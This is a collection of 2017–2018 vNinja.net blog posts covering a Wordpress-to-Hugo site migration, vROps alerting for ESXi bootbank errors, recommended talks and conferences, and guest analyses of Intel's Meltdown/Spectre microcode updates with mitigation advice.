Great! The url: parameter there is fantastic, as it means that old URLs still work as before, even though Hugo generates a new URL for them, with my preferred /:year/:month/:day/:filename/ format (because I believe easily accessible date information is pretty crucial). Win! Also, note how easy it is to have multiple URLs pointing to one post in Hugo! And if you want more, there is always the Alias: parameter. I then did a quick search and replace in all the files, replacing cmohn with Christian Mohn. I don’t really need the comments or wordpress_id metadata there anymore, but there’s really no harm in it being there, so I left them. Once that was done, I copied all my posts from the Exitwp conversion directory to my Hugo /content/posts directory, and all my posts showed up in Hugo locally! Awesome! Everything looked OK, until I realized that all the image references were pointing to the existing absolute URLs, which worked fine locally (as they pointed to the still-running Wordpress site when I ran the local Hugo server), but would break spectacularly once I pointed the domain to the new location. I’m glad I caught that one before cutting over the domain! Sadly this was a real pain to fix, due to the following issues: my general non-proficiency in regexp, and the fact that Wordpress is kind of stupid when it comes to uploads, as it places uploaded files into wp-content/uploads/{year}/{month}/(unknown). This made it hard to do a general search and replace for all the image references, so I pretty much went through each and every post, fixing and cleaning up the image URLs.
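For the simpler cases, a sed one-liner can rewrite absolute Wordpress upload URLs to a local path. This is a sketch against a scratch file, with a hypothetical domain and target /img/ layout, not the exact expression used during the migration:

```shell
# Hypothetical example: rewrite absolute Wordpress upload URLs to /img/
printf '![](https://vninja.net/wp-content/uploads/2018/01/shot.png)\n' > /tmp/post.md
# Strip the domain and the wp-content/uploads/{year}/{month}/ prefix
sed -i -E 's#https?://vninja\.net/wp-content/uploads/[0-9]{4}/[0-9]{2}/#/img/#g' /tmp/post.md
cat /tmp/post.md   # -> ![](/img/shot.png)
```

This only works when the target directory is flat; posts with captions, galleries or plugin-specific markup still need the manual cleanup described above.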
Once that was done, I also noticed that there was quite a lot of other Wordpress-specific stuff I needed to clean up. All posts with code snippets in them needed to be fixed, as they were littered with Wordpress-plugin-specific code tags. All posts that had images with captions also needed cleanup, as did any Wordpress galleries, as well as all the embeds I had (Twitter, Youtube etc.). The next thing I did was to parse through the image files in my /img/ folder, and optimize them. I used jpegoptim and optipng to accomplish that:

jpegoptim #
find . -name "*.jpg" -exec jpegoptim -m80 -o -p --strip-all {} \;

optipng #
find . -name "*.png" -exec optipng -o7 {} \;

By running this on my new img directory, which took quite a while on a total of >2.5k files, I got a reduction of ~47%, or 187 MB, from 393.9 MB to 206.6 MB, without any noticeable quality degradation. And that just about covers it: my Wordpress to Hugo migration, a short story long.

--- # Hello, My Name Is Hugo (Montoya) URL: https://vNinja.net/2018/07/19/hello-my-name-is-hugo/ Date: 2018-07-19 Author: christian Tags: vninja, site, news, hugo, wordpress

Goodbye Wordpress, hello Hugo! #

vNinja.net has been powered by Wordpress since it was launched back in 2010, and frankly it was time for a change. What really triggered it was my hosting provider's unwillingness to upgrade basic things, like PHP versions and MySQL. That, combined with the security issues you have to live with when using traditional shared hosting, made me look around for alternatives. While looking at hosting options, it slowly dawned on me that perhaps I should be looking at doing something completely different. After looking around a bit, I started playing with Hugo, and it just kind of stuck with me. The allure of everything being static, just plain old files written in Markdown, was impossible to resist. So, what you’re accessing right this very moment is the new vNinja, in its new Hugo-powered static glory, over HTTPS only!
When I discovered that I could combine Hugo, Github and Netlify, it just clicked. I can now edit — and preview — locally, wherever I am, check in changes to GitHub, and Netlify’s Continuous Deployment takes care of updating the site automatically. I’ve even created a Slack bot that notifies me of the status of the check-in and publishing, to make sure I catch it when I mess things up. Added bonus: being able to use whatever editor I fancy to edit this thing; at the moment Visual Studio Code looks like it will do the job just right. I’ve spent quite a few hours playing around, exporting all the existing vNinja content out of Wordpress and converting it over to the new Hugo format (and writing a new about page), and I’ve tried to make all old URLs work. I’ve updated quite a few posts with proper Markdown syntax, and I think I’ve managed to get most of the kinks ironed out. If you notice anything that looks weird, let me know via Twitter.

There are a few things I know aren't working, or are missing:
- Search is missing; I’ll add that later — Sneak preview here
- Author pages for guest authors, and how to handle multiple authors/guest posts in general
- Various theme tweaks — it’s a work in progress. Please provide feedback, if you have it.
- Favicon is not working right now, need to investigate that
- Not quite HTTPS-only at this point; seems I might have to change some things to make that happen
- The theme itself is a work in progress, expect changes or breakage. Or both.

I’ll do a writeup of the Wordpress to Hugo conversion process, and the challenges I met, as well as the Netlify setup, later on. For now, I just wanted it to go live.

--- # I've Complied, I think. URL: https://vNinja.net/rant/ive-complied-i-think/ Date: 2018-05-22 Author: christian Tags: GDPR

Like Sam and Simon over at definit.co.uk, I’ve done a quick GDPR-related overhaul of the site. Like the two English scholars and gentlemen, I’ve created the required Privacy Policy page.
I’ve also deleted all existing comments on the site, and disabled comments sitewide — hopefully that’s enough. Oh, joy.

--- # Keynote: Crossing the River by Feeling the Stones - Simon Wardley URL: https://vNinja.net/awesometalks/crossing-river-feeling-stones/ Date: 2018-05-09 Author: christian Tags: AwesomeTalk, Keynote, video, Youtube

This is the third talk I’ve found worthy of publishing in the Awesome Talks series. Enjoy Simon Wardley’s (Researcher, Leading Edge Forum) keynote from KubeCon + CloudNativeCon Europe 2018, called “Crossing the River by Feeling the Stones”. Simon’s presentation technique, flair and mastery of language are flat out impressive — and fun!

Crossing the River by Feeling the Stones #

Now, do you know what a map is? Do you, really?

--- # Alerting on "Bootbank cannot be found at path ‘/bootbank’" in vRealize Operations URL: https://vNinja.net/vmware-2/bootbank-cannot-be-found-at-path/ Date: 2018-01-29 Author: christian Tags: Alerting, vRealize Log Insight, vRealize Operations, vRLI, vROps, vSphere

If you boot your ESXi hosts from SD cards or USB, you might have run into this issue. Suddenly your host(s) display the following under events: “Bootbank cannot be found at path ‘/bootbank’.” Usually this means that the boot device has been corrupted somehow, either due to a device failure or other issues. Normally the host continues to run — until it’s rebooted, that is… For some reason, vRealize Operations doesn’t pick this up as a host issue that it alerts on, so if your alerting regime is based on vROps alerts, you might not get alerted immediately. Thankfully there is a way to remedy this, and have vROps and vRealize Log Insight work together at the same time. In order for this to work, you need to have configured the vRealize Log Insight integration with vRealize Operations first. Log in to Log Insight and search for “Bootbank cannot be found at path ‘/bootbank’.”. If you want to restrict it even more, use two filters.
One filter for vc_event_type = exists, and one for the text search itself. Click on the little red bell icon and select “Create Alert from Query”. This will bring up the “Edit Alert” window, where you can define your information. Create a proper Description and Recommendation for the alert, and enable “Send to vRealize Operations Manager”. You also need to specify a Fallback Option. The Fallback Option is basically which object Log Insight should attach the alert to, if the originating object isn’t found in vRealize Operations. And that’s it really; as long as the vRLI and vROps integration is configured and working, it’s easy to add your own custom alerts in vRLI, and have them pop up in vROps. If you want to copy my Description and Recommendation, here they are:

Description #

“The device containing the VMware ESXi bootbank can not be found. This may be because of a boot device failure. Specific details should be available in the symptom details. For more information, check the Tasks & Events pane for the host in the vSphere Web Client.”

Recommendation #

“Change or replace the boot device, if necessary. Contact the hardware vendor for assistance. After the problem is resolved, the alert will be canceled when the sensor that reported the problem indicates that the problem no longer exists.”

--- # The Curious Case of the Intel Microcode Part #2 - It Gets Better — Then Worse URL: https://vNinja.net/news/curious-case-intel-microcode-part-2-gets-better-worse/ Date: 2018-01-14 Author: Tags: Analysis, Intel, Meltdown, Security, Spectre, VMware

This guest post by Bjørn Anders Jørgensen, Senior Systems Consultant at Basefarm, first appeared on LinkedIn. Before you start on this rather long post, have a go at part #1.

tl;dr #

This is a long read. To get to the juicy part on how Intel potentially shipped pre-release microcode to partners, skip to section 3.
The short, short version is that the official Intel microcode update contains newer microcode for Skylake-SP and Kaby Lake/Coffee Lake than what is currently shipping from VMware/HPE/DellEMC etc.

Section 1: The good #

Last week I wrote about how Intel should improve their microcode update delivery mechanism and offer full disclosure on their microcode changes. Then this week events progressed in rapid succession:
- Intel released updated microcode bundle 20180108
- VMware released updated patches for vSphere, including microcode updates
- Then it was discovered that the updates cause stability issues
- Most computer vendors recalled BIOS updates for Haswell/Broadwell
- VMware recommended not to expose VMs to the new CPU feature flag
- I discovered that the Xeon SP and Kaby Lake/Coffee Lake updates from most or all vendors are based on the pre-release Intel bundle 20171215!

First of all, I have to say I feel for all the engineers and product managers taken by surprise when the news on the Meltdown and Spectre vulnerabilities broke early. Apparently the embargo was supposed to be lifted on 9 January, and everyone was working towards this date. There must have been extreme pressure from peers and customers. Mistakes will be made, but they could have been avoided if Intel were more transparent about their process and releases. Let's start with the Intel microcode bundle. Deconstructing the bundle using MC Extractor, you’ll find 94 binary files containing 196 individual microcode updates. Intel has released a single bundle with all updates going back to 1998. This is good! As far as I know there has not been a single update bundle going back this far. Additionally, all vSphere patches contain microcode updates for most production systems running vSphere, including an update for AMD EPYC processors, as described in the security advisory. You can find all the details on my github repository.
This is progress - however there are still no release notes or details except for the updated microcode versions for each processor family:

Updates upon 20171117 release:
IVT C0 (06-3e-04:ed) 428->42a
SKL-U/Y D0 (06-4e-03:c0) ba->c2
BDW-U/Y E/F (06-3d-04:c0) 25->28
HSW-ULT Cx/Dx (06-45-01:72) 20->21
Crystalwell Cx (06-46-01:32) 17->18
BDW-H E/G (06-47-01:22) 17->1b
HSX-EX E0 (06-3f-04:80) 0f->10
SKL-H/S R0 (06-5e-03:36) ba->c2
HSW Cx/Dx (06-3c-03:32) 22->23
HSX C0 (06-3f-02:6f) 3a->3b
BDX-DE V0/V1 (06-56-02:10) 0f->14
BDX-DE V2 (06-56-03:10) 700000d->7000011
KBL-U/Y H0 (06-8e-09:c0) 62->80
KBL Y0 / CFL D0 (06-8e-0a:c0) 70->80
KBL-H/S B0 (06-9e-09:2a) 5e->80
CFL U0 (06-9e-0a:22) 70->80
CFL B0 (06-9e-0b:02) 72->80
SKX H0 (06-55-04:b7) 2000035->200003c
GLK B0 (06-7a-01:01) 1e->22

Note that 20171117 is Intel's previous official release. Keep a mental note of version 80 for Kaby Lake/Coffee Lake and 200003c for Skylake-SP (Xeon SP). Also note the absence of Sandy Bridge updates. Section 2: The bad # With new microcode and OS patches available, tens if not hundreds of thousands of IT professionals spent much of last week planning and executing mitigation for the Meltdown and Spectre vulnerabilities. And with Spectre variant #2 (Branch Target Injection) requiring a microcode update, I will assume most also started deploying updated BIOS and Intel patches through the OS mechanism for Linux and vSphere. With the wider deployment it did not take long for customers to discover there were issues with system crashes or “higher system reboots”, as Intel marketing tries to spin it. How are system administrators supposed to make an informed decision based on that? It is quite ironic that Intel CEO Brian Krzanich at the same time makes his “Security-First Pledge” offering “Transparent and Timely Communications”.
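A small aside on reading those version numbers: microcode revisions are hexadecimal, which is easy to trip over when eyeballing versions ("ba" vs "c2" is an increase of 8, not a jump of 88). A minimal bash sketch for comparing two revisions numerically (the helper name is mine, not from any Intel tool):

```shell
#!/usr/bin/env bash
# rev_is_newer: true (exit 0) if hex revision $2 is strictly newer than $1.
# Uses bash's base-16 arithmetic; plain string comparison would mislead here.
rev_is_newer() {
  [ $((16#$2)) -gt $((16#$1)) ]
}

rev_is_newer 62 80 && echo "KBL-U/Y: 80 is newer than 62"
rev_is_newer 2000035 200003c && echo "SKX: 200003c is newer than 2000035"
```

Note that the `16#` base notation is bash-specific, so this will not run under a plain POSIX sh.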
It seems like Lenovo is the only vendor with some actual details on the issues:

(Kaby Lake U/Y, U23e, H/S/X) Symptom: Intermittent system hang during system sleep (S3) cycling. If you have already applied the firmware update and experience hangs during sleep/wake, please flash back to the previous BIOS/UEFI level, or disable sleep (S3) mode on your system; and then apply the improved update when it becomes available. If you have not already applied the update, please wait until the improved firmware level is available.

(Broadwell E) Symptom: Intermittent blue screen during system restart. If you have already applied the update, Intel suggests continuing to use the firmware level until an improved one is available. If you have not applied the update, please wait until the improved firmware level is available.

(Broadwell E, H, U/Y; Haswell standard, Core Extreme, ULT) Symptom: Intel has received reports of unexpected page faults, which they are currently investigating. Out of an abundance of caution, Intel requested Lenovo to stop distributing this firmware.

With all the system manufacturers removing their BIOS downloads for Haswell and Broadwell, and VMware recommending to “hide the speculative-execution control mechanism for virtual machines” if patches have already been applied, this cannot be described as anything short of an industry-wide recall. It is hard to say how bad it is, but if it is so bad that Intel is recalling the update, and the CEO and EVP are posting publicly, I think it is wise to await further updates and see how things pan out. Intel will release updated microcode soon and the various vendors will post new BIOS updates in the coming weeks. Go to the VMware link and note the various processors affected in yellow, because it gets worse: Section 3: The ugly # Disclaimer: The following analysis is made on a best-effort basis with little information. Intel is shipping old and new versions in their microcode update bundle.
It may be that they are for different CPU steppings of the same processor. While all this is unfolding I am trying to piece together what the Intel and VMware patches actually contain. Using MC extractor I was able to inspect the microcode bundles, map the updates to CPU models and cross reference different releases. The complete list is on github. In the rush to get patches out, it seems like Intel made some last minute changes that were not communicated to partners. I have been in contact with several vendors and none seem to be aware that changes were made after the unofficial pre-release bundle from 15. December that was shared under embargo. Luckily this only affects three processor generations, but combined with the Haswell/Broadwell issues, it leaves us with an awful mess and a potential open vulnerability. To quote my one week younger self: # So with six months lead time Intel has not been able to release an official microcode bundle update. The latest official one is from 17. November and does not seem to contain any Spectre fixes. Worse, it seems like the unofficial bundle is only partially fixing variant #2/Spectre. It is obvious that Intel made some last minute changes to microcode and failed to notify partners. What changes have been made between update bundle 20171215 and 20180108? Are we installing incomplete non-released microcode on millions of computers? Only Intel knows! It might be as simple as an effort to include some minor fixes now that everyone with an Intel processor has to update their computer, or it can be a monumental error where many computers are still partially vulnerable to Spectre even with patches installed. With the “security first” pledge from CEO Brian Krzanich promising transparency, I expect and demand an explanation from Intel. How is it that VMware, HPE and DellEMC can ship pre-release microcode to millions of computers? Intel microcode update bundle pre-release 15.
December:

+-------+--------------------------+---------+------------+---------+---------+----------+---------+--------+
| CPUID | Platform                 | Version | Date       | Release | Size    | Checksum | Offset  | Latest |
+-------+--------------------------+---------+------------+---------+---------+----------+---------+--------+
| 50654 | B7 [0, 1, 2, 4, 5, 7]    | 200003A | 2017-11-21 | PRD     | 0x6C00  | C088D252 | 0x64400 | Yes    |
| 806E9 | C0 [6, 7]                | 7C      | 2017-12-03 | PRD     | 0x18000 | 5C75A5FE | 0x8B000 | No     |
| 806EA | C0 [6, 7]                | 7C      | 2017-12-03 | PRD     | 0x17C00 | B81BC926 | 0xA3000 | Yes    |
| 906E9 | 2A [1, 3, 5]             | 7C      | 2017-12-03 | PRD     | 0x18000 | 6CF72404 | 0xBAC00 | No     |
| 906EA | 22 [1, 5]                | 7C      | 2017-12-03 | PRD     | 0x17800 | 55695D1F | 0xD2C00 | Yes    |
| 906EB | 02 [1]                   | 7C      | 2017-12-03 | PRD     | 0x18000 | 5046D998 | 0xEA400 | Yes    |
+-------+--------------------------+---------+------------+---------+---------+----------+---------+--------+

Intel microcode update bundle released 8. January:

+-------+--------------------------+---------+------------+---------+---------+----------+---------+--------+
| CPUID | Platform                 | Version | Date       | Release | Size    | Checksum | Offset  | Latest |
+-------+--------------------------+---------+------------+---------+---------+----------+---------+--------+
| 50654 | B7 [0, 1, 2, 4, 5, 7]    | 200003C | 2017-12-08 | PRD     | 0x6C00  | A4059069 | 0x0     | Yes    |
| 806E9 | C0 [6, 7]                | 80      | 2018-01-04 | PRD     | 0x18000 | 6961A256 | 0x0     | Yes    |
| 806EA | C0 [6, 7]                | 80      | 2018-01-04 | PRD     | 0x18000 | F6263DAE | 0x0     | Yes    |
| 906E9 | 2A [1, 3, 5]             | 80      | 2018-01-04 | PRD     | 0x18000 | 6AA1DE93 | 0x0     | Yes    |
| 906EA | 22 [1, 5]                | 80      | 2018-01-04 | PRD     | 0x17C00 | 84CABC68 | 0x0     | Yes    |
| 906EB | 02 [1]                   | 80      | 2018-01-04 | PRD     | 0x18000 | D24EDB7F | 0x0     | Yes    |
+-------+--------------------------+---------+------------+---------+---------+----------+---------+--------+

Note that all updates are labeled PRD for production.
If we take the VMware matrix and mark the recalled microcode in yellow and the potential pre-release in red, we get a pretty depressing chart: The same versions were also shipped in Dell BIOS updates. Thanks to Dell engineering for actually listing the microcode updates; I have not seen the same transparency from other vendors. HPE take note!

R740/R740xd/R640/R940/7920R: Updated the Intel Xeon Processor Scalable Family Processor Microcode to version 0x3A.
R830: Updated the Intel Xeon Processor E5-2600 v3 Product Family Processor Microcode to version 0x3B. Updated the Intel Xeon Processor E5-2600 v4 Product Family Processor Microcode to version 0x0b000025.
R630/R730/R730XD: Updated the Intel Xeon Processor E5-2600 v3 Product Family Processor Microcode to version 0x3B. Updated the Intel Xeon Processor E5-2600 v4 Product Family Processor Microcode to version 0x0b000025.
R930: Updated the Intel Xeon Processor E7-4800/8800 v3 Product Family Processor Microcode to version 0x10. Updated the Intel Xeon Processor E7-4800/8800 v4 Product Family Processor Microcode to version 0x0b000025.

The Rx30 updates have now been removed from the Dell web page due to the aforementioned issues, but the R740 update is still there. Should it be recalled as well? Hard to tell; I think an update from Intel is in order. I have not been able to attempt to load the new microcode on a server to confirm that it actually would apply, but I tested on my Precision 5520 laptop, which uses a Xeon E3-1505M v6 processor, with the help of the VMware microcode update driver for Windows, and the microcode updates from 7C to 80: Some advice # So what is a system administrator to do? My advice is to wait it out. The situation is still fluid and changes almost daily. Let the dust settle and hope for some more clarity in the coming week. Remember that microcode updates are only needed for the Spectre variant #2 vulnerability, which is the hardest to exploit.
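Part of waiting it out is knowing where you currently stand. A sketch, assuming a Linux kernel new enough to expose the sysfs vulnerabilities interface (mainline gained it around this time, in 4.15, and distros have backported it); the `show_vulns` helper name is mine:

```shell
# Print "name: status" for each vulnerability file the kernel exposes.
# The default path is the standard sysfs location on patched Linux kernels;
# pass another directory to exercise the formatting against sample files.
show_vulns() {
  local dir="${1:-/sys/devices/system/cpu/vulnerabilities}"
  local f
  for f in "$dir"/*; do
    printf '%s: %s\n' "${f##*/}" "$(cat "$f")"
  done
}
```

On a patched kernel `show_vulns` prints lines such as `meltdown: Mitigation: PTI`; on an unpatched kernel the directory simply does not exist, which is an answer in itself.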
If you already started patching vSphere, consider a rollback or implement the workaround from VMware. Focus on patching Meltdown on soft targets such as laptops. These devices are much more likely to be running untrusted code. Don't forget applications, especially browsers. Researchers have been able to exploit Meltdown and read non-cached data. The hackers cannot be far behind. Combining Meltdown with a remote exploit could be disastrous. https://twitter.com/aionescu/status/952014225714511872 As everything except the Raspberry Pi is vulnerable to Spectre, focus on mobiles and tablets as well. Map your vulnerable devices and vendor updates. Pace yourself, we will be fighting this for years to come. There will be more side-channel vulnerabilities in the future and this is not the last round of patching. Keep in mind that there are no microcode updates for Sandy Bridge processors yet. This is why Dell and HPE are holding back updates for PowerEdge 12G servers and ProLiant Gen8 servers. If you have a lot of Xeon 4600/2600/1600/1400/1200 V1 servers, you will have to wait on Intel and the server vendors if you want full mitigation for Spectre. --- # The Curious Case of the Intel Microcode URL: https://vNinja.net/news/the-curious-case-of-the-intel-microcode/ Date: 2018-01-09 Author: Tags: Analysis, Intel, Meltdown, Security, Spectre This guest post by Bjørn Anders Jørgensen, Senior Systems Consultant Basefarm, first appeared on LinkedIn. Disclaimer: This is a report based on developments as of 7. January; the situation is changing by the hour, so read this opinion piece with that in mind. Unless you have been living under a rock for the last week you will know by now that there is a universal design flaw in most modern microprocessors, leaving them vulnerable to a serious information disclosure problem that requires updates to all operating systems and processors.
If you are not familiar with the issue, start here: Meltdown and Spectre Jan Wildeboer also has a comprehensive timeline: How we got to #Spectre and #Meltdown A Timeline The issue has been known by Intel at least since June, and has been under embargo while everyone has been hammering out code to mitigate the threat and be ready when the embargo was lifted. So we have three vulnerabilities, one of which requires a microcode update: CVE-2017-5715 (variant #2/Spectre) aka branch target injection. Microcode is a small piece of code that can be loaded by the processor at boot time, either from the BIOS or from the operating system. Intel has been using this method for more than a decade to solve bugs and issues. It is a well known process. All HW vendors ship regular BIOS updates containing microcode updates, and most modern operating systems have facilities to distribute and deploy microcode updates. This includes Linux, Windows and ESXi. While most Linux distros keep an updated microcode repository, Microsoft and VMware have occasionally added microcode updates for serious issues. So with everything blowing up this week, you’d think Intel would prepare microcode updates and ensure that OS patches contained the updated microcode so that you were completely secure from the known vulnerabilities (more on the unknowns later). No! We all have to wait for the HW vendors to release updated BIOS for all our computers. They are of course completely overloaded and will prioritize new models. Currently (7. Jan) on the server side, Dell has pretty good coverage for 13G and 14G servers and HPE has pretty good coverage for 9G and 10G servers. Anything older than 3 years is still vulnerable even after patching the OS/hypervisor. On the consumer side, it is all over the place.
Disclaimer: The Register claims that variant #2/Spectre only requires microcode updates for Skylake and newer microarchitectures, in which case the tier 1 vendors already have good coverage, but the tier 2 and tier 3 vendors will lag for months. Even Cisco is not planning BIOS updates until 14. February! Intel is, as usual, very, very quiet regarding microcode updates. They usually come with little or no release notes, and are basically treated like a black box, even though they become an integral part of the system, changing critical functions in the CPU. The only content I’ve found was from an updated Debian bug report: New upstream microcodes to partially address CVE-2017-5715 + Updated Microcodes:

sig 0x000306c3, pf_mask 0x32, 2017-11-20, rev 0x0023, size 23552
sig 0x000306d4, pf_mask 0xc0, 2017-11-17, rev 0x0028, size 18432
sig 0x000306f2, pf_mask 0x6f, 2017-11-17, rev 0x003b, size 33792
sig 0x00040651, pf_mask 0x72, 2017-11-20, rev 0x0021, size 22528
sig 0x000406e3, pf_mask 0xc0, 2017-11-16, rev 0x00c2, size 99328
sig 0x000406f1, pf_mask 0xef, 2017-11-18, rev 0xb000025, size 27648
sig 0x00050654, pf_mask 0xb7, 2017-11-21, rev 0x200003a, size 27648
sig 0x000506c9, pf_mask 0x03, 2017-11-22, rev 0x002e, size 16384
sig 0x000806e9, pf_mask 0xc0, 2017-12-03, rev 0x007c, size 98304
sig 0x000906e9, pf_mask 0x2a, 2017-12-03, rev 0x007c, size 98304

* Implements IBRS and IBPB support via new MSR (Spectre variant 2 mitigation, indirect branches). Support is exposed through cpuid(7).EDX.
* LFENCE terminates all previous instructions (Spectre variant 2 mitigation, conditional branches).

Note the use of “partially”. We’ll get back to that in a minute. Breaking open the package, the changelog says: "unofficial bundle with CVE-2017-5715 mitigation" So with six months lead time Intel has not been able to release an official microcode bundle update. The latest official one is from 17. November and does not seem to contain any Spectre fixes.
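As a side note, entries in that Debian changelog format are regular enough to slice up with standard tools when cross-referencing releases. A small illustrative sketch (the `extract_revs` helper is mine, and the sample lines are taken from the excerpt above):

```shell
# Print "signature revision" pairs from Debian-style microcode changelog lines.
# Fields: sig <cpuid>, pf_mask <mask>, <date>, rev <revision>, size <bytes>
extract_revs() {
  awk '/^sig /{gsub(",","",$2); gsub(",","",$7); print $2, $7}'
}

extract_revs <<'EOF'
sig 0x000806e9, pf_mask 0xc0, 2017-12-03, rev 0x007c, size 98304
sig 0x00050654, pf_mask 0xb7, 2017-11-21, rev 0x200003a, size 27648
EOF
```

This prints `0x000806e9 0x007c` and `0x00050654 0x200003a`, which is enough to diff one bundle's revisions against another's.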
Worse, it seems like the unofficial bundle is only partially fixing variant #2/Spectre. Why is Intel not using the tried and tested OS microcode update method to resolve what is arguably one of the most serious IT security issues in history? It could easily be included with the patch sets for the major OS vendors, as Debian and other Linux distros have done. It has been done for VMware ESXi and Microsoft Windows for less serious issues. And with the microcode revision that “partially address CVE-2017-5715” matching what the server vendors are releasing, do we have more updates coming? Intel really needs to get a grip on this. These kinds of side-channel attacks are a completely new vulnerability category, and now that researchers are focusing on this, there will be more coming. As Anders Fogh said in an early blog post: "While I did set out to read kernel mode without privileges and that produced a negative result, I do feel like I opened a Pandora’s box." So we possibly have a partial patch currently, and most likely new vulnerabilities coming down the road. I absolutely implore Intel to get a grip and prepare for quick microcode updates and distribution. There is no way that the server vendors will be able to release another BIOS update for such a huge number of servers. The only sensible way is to use the OS update mechanism, even though that is not persistent and could potentially be tampered with. And please, we need full disclosure. I suspect a lot of people believe they have resolved the vulnerability, while in fact they have not. For virtual machines there are more steps required for the VM to enable the patch. More on that in a follow up post. Note: We do have some unofficial Intel microcode repositories by BIOS modders and enthusiasts.
While I applaud the effort and work, it really should not be necessary, and while the microcode is signed by Intel, modifying the inner workings of the CPU opens the door to absolutely undetectable persistent hacks, so microcode should only come from an official source. --- # Evaluating 2017 URL: https://vNinja.net/misc/evaluating-2017/ Date: 2017-12-18 Author: christian Tags: 2017, Review Keeping up with tradition (you thought I was going to say Kardashians there, didn’t you?), it’s time to evaluate 2017. My list of goals for 2017 and the verdict is as follows: Get that VCAP6-DCV Design exam out of the way. Done and dusted (for 6.5 that is, not 6.0). I’ve also updated my VCP to 6.5, and I’m currently waiting for the VCAP6.5-DCV Deploy exam. Score: 10/10 AWS Associate Certifications Didn’t happen. Haven’t done any of these, nor really studied for any of them (yet). Other certifications or time sinks have completely eradicated these. Score: 0/10 Learn something new This one is hard to gauge, but 2017 has definitely been a learning experience in many ways. Not that many tangible and measurable items here, but I’ll still rate it as medium. This category needs to be easier to assess for 2018. Score: 5/10 Attend an industry conference VMworld 2017 in Barcelona was awesome, as I expected. Score: 10/10 vNinja.net Well, the In The Bag series didn’t last that long, which was one of the main goals. I have kept posting whenever I feel like it, without any pressure, and in total I’ve posted more in 2017 than I did in 2016. I have a theory as to why there aren’t as many technical VMware posts though, but I’ll keep that as a separate post for later. All in all, not bad. Score: 5/10 Photography I’m still not really happy with the amount of photography done in 2017, but I’m really happy with a few of the shots I did manage to take and publish. Huge improvement from 2016.
Score: 8/10 As far as my more “soft” goals for 2017 go: I need to get better at planning things out — I think I’ve managed to do this, to a degree. I’ve become much better at breaking larger tasks into smaller ones, and following them through. Productivity is always an ongoing process, but I notice that compared to many I interact with, I seem to have a better grasp of the tasks I need to complete, and don’t forget nearly as much as I used to. It’s an ongoing process, but I’m definitely moving in the right direction. Clearer focus — Closely correlated to the point above, but I’ve improved in this area as well. Get more sleep — I still sleep less than I think I should, but it’s better than it has been for years. All in all that gives me a personal score of 38 out of a possible 60. Not quite what I wanted, but it’s an improvement over the 28 rating for 2016. One of the major categories did get a 0/10, which really puts a dent in the score. I should have put in a general certification category instead; that would have helped bring the score up, as I did a few I didn’t initially plan on. All in all, 2017 has been pretty good both professionally and personally. Now it’s time to breathe, relax and make sure 2018 will be even better. --- # Nordic VMUG Conference 2018 URL: https://vNinja.net/news/nordic-vmug-conference-2018/ Date: 2017-12-13 Author: christian Tags: Awsome, conference, Denmark, VMUG My good friends, and fellow VMUGgers, in Denmark are once again arranging the largest VMUG event in the Nordics in January 2018.
The Nordic VMUG Conference promises to be just as awesome as previous versions, just have a look at this speaker list:

Opening Keynote: Kit Colbert
Breakout sessions: Ole Agesen, Duncan Epping, Myles Gray, Frank Denneman, Niels Hagoort, Grant Orchard and Joerg Lew
Closing Keynote: Ken Westin

Community Sessions:
Michael Armstrong - A sneak peek behind the scenes of running the VMworld Hands On Labs
Steffen Christensen - From The Field: Most Common vRA/vRO Use Cases from The Real World
Thomas Poppelgaard - Horizon in Azure: all you need to know
Johan van Amersfoort - VMware Workspace ONE: How to secure a workplace without concessions?
Jacob Styrup Bang - A bottom up presentation of Aarhus University’s new SDDC
Michael Monberg - Tips & Tricks in vROps
Mads Fog Albrechtslund - Create scalable and reusable code in vRealize Orchestrator
Stefan Pahrmann - NSX micro-segmentation in the real world
Simon Eady - Roundtable: vROps Clinic / Workshop — Come and discuss all things vROps. Design, Alerts, policies etc.

Startup Session: Per Buer - IncludeOS

In addition to the incredible list of speakers, the Danish VMUG has reserved the whole of the Fields movie theater for this all-day event, which promises to be full-on awesome in every way. Reserve January 11th, and register now! I can guarantee you won’t regret it! --- # Scott Hanselman - "It's not what you read, it's what you ignore" URL: https://vNinja.net/awesometalks/scott-hanselman-its-not-what-you-read-its-what-you-ignore/ Date: 2017-11-27 Author: christian Tags: This is the second recorded talk published in the Awesome Talks series. This time it’s Scott Hanselman’s “It’s not what you read, it’s what you ignore” talk from Dev Day in Kraków way back in 2012. This isn’t a technical talk; it’s originally geared towards developers, but Scott’s message should resonate with everyone in the tech field. In general, it’s about how you can deal with large amounts of information. Lots of great takeaways here! Enjoy!
BTW: Hey, Scott did not suck that much. --- # macOS: Vanilla URL: https://vNinja.net/osx/macos-vanilla/ Date: 2017-11-24 Author: christian Tags: Small, unobtrusive and easy to use. That’s a pretty good description of a macOS utility I recently discovered: Vanilla (non-affiliate link). Simply put, this little gem lets you hide any or all menu bar icons in macOS, while still keeping them easily accessible behind a small arrow: After hiding with Vanilla: Expanded view: I for one like getting rid of the unnecessary clutter! --- # LISA17 - "Don't You Know Who I Am?!" The Danger of Celebrity in Tech URL: https://vNinja.net/awesometalks/lisa17-dont-you-know-who-i-am-the-danger-of-celebrity-in-tech/ Date: 2017-11-22 Author: christian Tags: This is the first post, in what hopefully will turn into a series of posts, highlighting awesome talks that are freely available. There is a lot of great content out there, both inspirational and funny, and I’ll try to publish my favorites when I find them. So here is the first one! John Nicholson shared this awesome talk by Corey Quinn from LISA17, which should be mandatory viewing for anyone attending conferences, or talks in general. Not only does it dive into the culture of asking questions when attending a talk, but it also has lots of good information for speakers. Trust me, this is ~44 minutes very well spent. --- # Webinar: Veeam integration with VMware vSAN, vSphere tags and SPBM policies URL: https://vNinja.net/virtualization/webinar-veeam-integration-with-vmware-vsan-vsphere-tags-and-spbm-policies/ Date: 2017-11-13 Author: christian Tags: Self Promotion, Veeam, Webinar Warning: Shameless self promotion ahead! November 30th I’ll be joining Martin Plesner-Jacobsen from Veeam for a live webinar: Veeam integration with VMware vSAN, vSphere tags and SPBM policies. Now that’s a lot of goodies in one place!
